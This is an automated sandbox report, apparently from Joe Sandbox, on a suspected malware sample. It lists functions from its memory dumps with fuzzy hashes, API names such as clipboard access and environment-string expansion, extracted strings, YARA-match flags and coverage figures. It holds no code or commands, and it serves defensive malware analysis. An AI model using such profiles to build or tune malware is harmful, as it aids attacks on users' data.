                                                              • Opcode Fuzzy Hash: f95921265e9851a63917028a6ef760884a350e0ab274218a1fd4096a17488e74
                                                              • Instruction Fuzzy Hash: 2A1134B01083458BD714CF51C1A066BF7E1FF89788F14995EE4D19B251D7BCD909CB8A
                                                              Function 02130918 Relevance: .0, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0d71a57cd882e273a6c56ce9b72a8ed7186c85e47ae9bb2a3c29e23a8caddaad
                                                              • Instruction ID: 1415ce345f24f99295bee5beb27923bc6af5aa0f77b5605c747efa5a55718efb
                                                              • Opcode Fuzzy Hash: 0d71a57cd882e273a6c56ce9b72a8ed7186c85e47ae9bb2a3c29e23a8caddaad
                                                              • Instruction Fuzzy Hash: 5811C5746493808BE324DF14C864B9FFBF1BF86304F044A2CE5859B291D77A9815CB96
                                                              Function 004106B1 Relevance: .0, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0d71a57cd882e273a6c56ce9b72a8ed7186c85e47ae9bb2a3c29e23a8caddaad
                                                              • Instruction ID: 889cefc2f7097b9c6db9ab6823b190a93607d6c31bc0b71ec5331936f27af802
                                                              • Opcode Fuzzy Hash: 0d71a57cd882e273a6c56ce9b72a8ed7186c85e47ae9bb2a3c29e23a8caddaad
                                                              • Instruction Fuzzy Hash: A711F5746093808BE324DF14C8A4B9FFBF1BB86304F044A2DE5959B2D1D7BA9845CF86
                                                              Function 0212FE1B Relevance: .0, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 52f227c8592f5c2cc3229bd8a018e3a24b41eaee9032ee69e0cbf16b167d9f9e
                                                              • Instruction ID: 8172beae0a4536a18604c14902df373d6940f63ad5af5521dd640a0ef48b2865
                                                              • Opcode Fuzzy Hash: 52f227c8592f5c2cc3229bd8a018e3a24b41eaee9032ee69e0cbf16b167d9f9e
                                                              • Instruction Fuzzy Hash: 35116D701883C28BD3358F14D864BEFB7E1BB86345F58182CD89987282D37985558F46
                                                              Function 0040FBB4 Relevance: .0, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 52f227c8592f5c2cc3229bd8a018e3a24b41eaee9032ee69e0cbf16b167d9f9e
                                                              • Instruction ID: e698e1f68e38f1bc9b47cf2ac497e118824270fadebddc114e7481b80e060ba0
                                                              • Opcode Fuzzy Hash: 52f227c8592f5c2cc3229bd8a018e3a24b41eaee9032ee69e0cbf16b167d9f9e
                                                              • Instruction Fuzzy Hash: 90115B741883C28BE3348F04D864BEFB7E1BB86345F48183DD899962C2D37988558F4A
                                                              Function 0215917C Relevance: .0, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fb520afb4c7028e21bc1d123390b4ebc175e9035a42cbe707a82af3ce4ea84c5
                                                              • Instruction ID: cfd06a897aea41da8086a62d87843524a68f12a712f989423dc4fea5bc8c2190
                                                              • Opcode Fuzzy Hash: fb520afb4c7028e21bc1d123390b4ebc175e9035a42cbe707a82af3ce4ea84c5
                                                              • Instruction Fuzzy Hash: 43E01AAA9512B08BCB688F24D891572B7A0EB43A54B59505DA856E7250D730E800CB46
                                                              Function 00438F15 Relevance: .0, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fb520afb4c7028e21bc1d123390b4ebc175e9035a42cbe707a82af3ce4ea84c5
                                                              • Instruction ID: fea6b9262a02cc5a27262c34f28cf05daf4f77e687b26c47e49c1a77e78bbb2c
                                                              • Opcode Fuzzy Hash: fb520afb4c7028e21bc1d123390b4ebc175e9035a42cbe707a82af3ce4ea84c5
                                                              • Instruction Fuzzy Hash: 03E04FBB9112608BCBA88F24D991576F7B1EB47F50B59601EE446F7350DA34EC00CB0A
                                                              Function 021412E0 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 262a0625e730f3a272db31694606eccad8b6e132ec4b2629bc2c27a0c5ad0a2d
                                                              • Instruction ID: febf51c05d1b71ed4513c4515b89ff1cf8ed6258c1b80a97410d1b1a1513b196
                                                              • Opcode Fuzzy Hash: 262a0625e730f3a272db31694606eccad8b6e132ec4b2629bc2c27a0c5ad0a2d
                                                              • Instruction Fuzzy Hash: 9BE0C29468858387C7098E299470337FBE95F0320EF2891B9D8DECB841EF25E0C08704
                                                              Function 0212CD77 Relevance: .0, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                              • Instruction ID: fbec960c2d4b64681a9317672aaca149ee78959af374ada8bfa953e237063ae2
                                                              • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                              • Instruction Fuzzy Hash: 22D097605883B40E4B088D3804A087BFFE4ED43512F08108FF0C1E3005C321D80683D8
                                                              Function 0040CB10 Relevance: .0, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                              • Instruction ID: 15f5a020169ecd94f448affbf7eac2585d4a5225e6d21b45986e377c0b9b8dd8
                                                              • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                              • Instruction Fuzzy Hash: 52D0A7715487A14ED7588E3824E157BFBF8E947612B1825AFE4D1F3245D234EC01879D
                                                              Function 007A2D2F Relevance: .0, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152378881.000000000079D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0079D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_79d000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 84637ed40dc845524da0f22a5c459a29830c068504c1783cee47edcb1d8e9528
                                                              • Instruction ID: 9c25957a02b0c50e1544ebe2d71411fe246a90e6a9f0a21d5aaf03be7ac13e80
                                                              • Opcode Fuzzy Hash: 84637ed40dc845524da0f22a5c459a29830c068504c1783cee47edcb1d8e9528
                                                              • Instruction Fuzzy Hash: 4BD0C962A492CA8ED3128B31818ABD1BFD5AF52200B1E55EAC0E44E456C1289085DF21
                                                              Function 0213D097 Relevance: .0, Instructions: 7COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cc8df1d88a68718305d81cb7bbe64538c0baeb9b6a0cc46f2b02e3b4a1a8a6cf
                                                              • Instruction ID: 699feb5ee3d94f7cfc0a453b2fe9a3727c550fe2d3f5ff42bb8cfa63ada4f839
                                                              • Opcode Fuzzy Hash: cc8df1d88a68718305d81cb7bbe64538c0baeb9b6a0cc46f2b02e3b4a1a8a6cf
                                                              • Instruction Fuzzy Hash: D6A00238A4550187D104DF00D690475B335738B501B50B154D615231568B60D401C55C
                                                              Function 0213CF1A Relevance: .0, Instructions: 7COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 03f580e30a6611fca79c1431b30a1db64368cf35633a261591e3f40f90ed873e
                                                              • Instruction ID: 3ef96da8efbfa169e98678a181f5cf30cbc18a4f7711341d604041cc041c4401
                                                              • Opcode Fuzzy Hash: 03f580e30a6611fca79c1431b30a1db64368cf35633a261591e3f40f90ed873e
                                                              • Instruction Fuzzy Hash: C5A0022DD8A042DD81301FBA55142B4E3B99BC7321F59B865511C330614971D401C56D
                                                              Function 0214EEF7 Relevance: 50.9, APIs: 4, Strings: 25, Instructions: 184COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Object$DeleteSelect
                                                              • String ID: $(ID$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$4ID$@ID$LID$XID$dID$pID$|ID$HD$HD
                                                              • API String ID: 618127014-763545205
                                                              • Opcode ID: 39b23aab81d1e412ac723355e7e0d380e93785fe029945261b041932a7300441
                                                              • Instruction ID: 60327d0f96a7b3deecf0ce21178eeb5ed9b1cd1e9f4d058b5d703ebe2579cb86
                                                              • Opcode Fuzzy Hash: 39b23aab81d1e412ac723355e7e0d380e93785fe029945261b041932a7300441
                                                              • Instruction Fuzzy Hash: C8B18CB85093808FE364DF29D58579BBBE0ABC9304F00892EE9D987350D7749548DF8A
                                                              Function 0214ED17 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 127clipboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Clipboard$Global$CloseDataInfoOpenWindowWire
                                                              • String ID: @$A$C$F
                                                              • API String ID: 2111159801-319984173
                                                              • Opcode ID: f102b88c657c0386999a50c9b84d9cf073ded92d13a1d40d33957346412eb39a
                                                              • Instruction ID: 9d9573be75a9c5bbd037e5b596e149fc916bbd152d12eab1182f3229f1a47026
                                                              • Opcode Fuzzy Hash: f102b88c657c0386999a50c9b84d9cf073ded92d13a1d40d33957346412eb39a
                                                              • Instruction Fuzzy Hash: 3651447050C381CFC350DF28948876EBFE1BB96224F540E2EF4E996292DB398549CB93
                                                              Function 0213D207 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 200COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0213D307
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0213D334
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID: K-K/$U5U7$\1B3
                                                              • API String ID: 237503144-1235027928
                                                              • Opcode ID: aa3d6e910086139519e9c9cd08a0e925ab7e68abe48d6d60585da4ebcdaefe44
                                                              • Instruction ID: 259a85951e8ceaaf0cc1f49baec53614baf56d7763497f38d46630b436a14261
                                                              • Opcode Fuzzy Hash: aa3d6e910086139519e9c9cd08a0e925ab7e68abe48d6d60585da4ebcdaefe44
                                                              • Instruction Fuzzy Hash: 21617C716483518FD329CF14C890BABB7E6EFC6318F054A1DE8E65B381D7749905CB92
                                                              Function 0213D205 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 198COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0213D307
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0213D334
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID: K-K/$U5U7$\1B3
                                                              • API String ID: 237503144-1235027928
                                                              • Opcode ID: 7e8e35e858b108638980d6d7e1e17baf955cfc2ddcbe4743595041ff48c6fafd
                                                              • Instruction ID: 18d86b2526c07376b0b3866fa824bad983d023d3c90902d68cc699adbc068964
                                                              • Opcode Fuzzy Hash: 7e8e35e858b108638980d6d7e1e17baf955cfc2ddcbe4743595041ff48c6fafd
                                                              • Instruction Fuzzy Hash: 67616B716483518FE329CF14C8A0BABB7E6EFC6318F054A1DE8E65B280D7749905CB97
                                                              Function 0213DB47 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 161COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 0213DC71
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0213DCA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID: eI.K$qs
                                                              • API String ID: 237503144-3936219367
                                                              • Opcode ID: dc374d62b46038b04298b2915cbc0a4bfca21c88bdf5701a0e3bab2608cdf6d9
                                                              • Instruction ID: 8ac36f4162f9a61d23ea9e6d7217f6d0fe7c30ee64bc9c665ff21cca17219ab2
                                                              • Opcode Fuzzy Hash: dc374d62b46038b04298b2915cbc0a4bfca21c88bdf5701a0e3bab2608cdf6d9
                                                              • Instruction Fuzzy Hash: E05165B0100B049BD7358F26C890BA7BBB6FB46314F544A1CE8A64FB85D7B4E409CB94
                                                              Function 02129107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • of system that leetspeak, reflection primarily the of other modified on glyphs resemblance is replacements similarity or eleet the ways used character a often spellings on play uses their via internet. or it in, xrefs: 02129145
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID: of system that leetspeak, reflection primarily the of other modified on glyphs resemblance is replacements similarity or eleet the ways used character a often spellings on play uses their via internet. or it in
                                                              • API String ID: 621844428-2804141084
                                                              • Opcode ID: 13dc76ea7de215e409e79daecf993f3e92855b2eb19abbbd6ec502212a96d9e6
                                                              • Instruction ID: 078119302478a9d7c0d23cf6ad5a7f9496a301e0247b2b4ea9a18792eb1d367e
                                                              • Opcode Fuzzy Hash: 13dc76ea7de215e409e79daecf993f3e92855b2eb19abbbd6ec502212a96d9e6
                                                              • Instruction Fuzzy Hash: 0AF0FF74C88731CFC7187F7A954926E7BA9AF11330F21496EE8A681194DB34806DCE93
                                                              Function 02133415 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 363COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,00000000,?), ref: 02133AEB
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,?,?), ref: 02133B1C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID: V"
                                                              • API String ID: 237503144-2019076553
                                                              • Opcode ID: 95e61789491e88786c18cc1acbf7ba66db770f412e53d14d44e515f6fe15e3af
                                                              • Instruction ID: 280e10d1a53930c08749d1b92436feb557cfe3e2736e2e1281b08dd6120c29be
                                                              • Opcode Fuzzy Hash: 95e61789491e88786c18cc1acbf7ba66db770f412e53d14d44e515f6fe15e3af
                                                              • Instruction Fuzzy Hash: BBE139B05883828BE335CF14C854BEFBBE2BFC4315F48496DE8A987281D77A55458F86
                                                              Function 004131AE Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 363COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,00000000,?), ref: 00413884
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,?,?), ref: 004138B5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID: V"
                                                              • API String ID: 237503144-2019076553
                                                              • Opcode ID: 856c4f6a3e30eb9153f14b8215bba94b29a403e190c90c0dbe90c268fa1ef07e
                                                              • Instruction ID: b8f590afc6553ff7605340d13dff726c6823d6bb3a5fa6397772a6377b5bee3a
                                                              • Opcode Fuzzy Hash: 856c4f6a3e30eb9153f14b8215bba94b29a403e190c90c0dbe90c268fa1ef07e
                                                              • Instruction Fuzzy Hash: F8E138B05483828BD735CF14C854BEFBBE1BFC5309F48492DE89987282D7B999448F96
                                                              Function 0214BB99 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 244COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: String
                                                              • String ID: /$_
                                                              • API String ID: 2568140703-3328996620
                                                              • Opcode ID: 67fdbd68d30403a612d78c29cb09f4595bf568f7c7babfc7a8b0866fd35ec808
                                                              • Instruction ID: 7b9e334510631ea098871f0028d16fa2d076ec00734b36fbcb3af6556ad91382
                                                              • Opcode Fuzzy Hash: 67fdbd68d30403a612d78c29cb09f4595bf568f7c7babfc7a8b0866fd35ec808
                                                              • Instruction Fuzzy Hash: EBA1A272A4D7818FC739CA28C8A03DBBBD2ABD5314F194A6CD4E9873D1DB358941CB42
                                                              Function 0042B932 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 244COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SysStringLen.OLEAUT32 ref: 0042B93C
                                                                • Part of subcall function 00435440: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeapString
                                                              • String ID: /$_
                                                              • API String ID: 983180023-3328996620
                                                              • Opcode ID: 7b73d8b9ad9cc1b35f354d087cce934941f6cc43b019e35cf5136909c666bbea
                                                              • Instruction ID: 6447c4c98e9839bbfe30095b09fd38d16c8898c21f8e458fc47884f27b927c9d
                                                              • Opcode Fuzzy Hash: 7b73d8b9ad9cc1b35f354d087cce934941f6cc43b019e35cf5136909c666bbea
                                                              • Instruction Fuzzy Hash: EBA1D372B097918FC3398A28C8903DFBBD2ABD5320F584A2DD4E9873D1DB359841C786
                                                              Function 0214AC76 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: String
                                                              • String ID: /$_
                                                              • API String ID: 2568140703-3328996620
                                                              • Opcode ID: e081c47d38b82d7d45e90f16465fe229bee5c6a2502c73ee57cf6a8e50573acb
                                                              • Instruction ID: 7037e8c761c6392fa663e7404b55f2409ee2d7f7549a504a2d6b862acd1451a1
                                                              • Opcode Fuzzy Hash: e081c47d38b82d7d45e90f16465fe229bee5c6a2502c73ee57cf6a8e50573acb
                                                              • Instruction Fuzzy Hash: 7C9198726497818FC339CA28C4607DBBBE2AFD5314F1A4A6DD4E9873D1DB369801C742
                                                              Function 0042AA0F Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SysStringLen.OLEAUT32 ref: 0042AA1D
                                                                • Part of subcall function 00435440: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeapString
                                                              • String ID: /$_
                                                              • API String ID: 983180023-3328996620
                                                              • Opcode ID: 89d5c1be592629ebb1dc1eb5a24e35478a07929717f2f29c77da904c78c10030
                                                              • Instruction ID: c0f22b295fcd5dfa813694d41399a3aed2f8b54868401d176934dc4335e9d724
                                                              • Opcode Fuzzy Hash: 89d5c1be592629ebb1dc1eb5a24e35478a07929717f2f29c77da904c78c10030
                                                              • Instruction Fuzzy Hash: B291A5327093918FC725CE28C8903DBBBE2ABD5314F594A6DD8E9873D1D6359841CB47
                                                              Function 00422158 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00435440: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 004222C9
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 004222FE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings$AllocateHeap
                                                              • String ID: hi
                                                              • API String ID: 3432729115-3633523372
                                                              • Opcode ID: 2c7b023f8f8e668f3c59ff73d8f09038c84363a572d6bc4f892e354ca4515ac2
                                                              • Instruction ID: 955b234eacedc5ad79a5fbc0d5aeb5eb286d5c951f72c93c1ad7127c08102aad
                                                              • Opcode Fuzzy Hash: 2c7b023f8f8e668f3c59ff73d8f09038c84363a572d6bc4f892e354ca4515ac2
                                                              • Instruction Fuzzy Hash: 3F5187B06083919FE324CF14D8807ABBBE5FBC5704F90892DF9999B280CB749805CB97
                                                              Function 021423BF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 02142530
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 02142565
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID: hi
                                                              • API String ID: 237503144-3633523372
                                                              • Opcode ID: 29d7f95366c994b5a62b8ac23ea0115722bb9db87849136ec9dd399547f2272f
                                                              • Instruction ID: 78c7286e8940f96e3c7d40dedd5d48ff8d9f4534c23cb14f6bcfd3db4186e33c
                                                              • Opcode Fuzzy Hash: 29d7f95366c994b5a62b8ac23ea0115722bb9db87849136ec9dd399547f2272f
                                                              • Instruction Fuzzy Hash: A34146B06483959FE324CF54C894BABBBE6FFC2740F80492CF9995B290CB748405CB92

                                                              Execution Graph

                                                              Execution Coverage:50.9%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:20.5%
                                                              Total number of Nodes:39
                                                              Total number of Limit Nodes:1
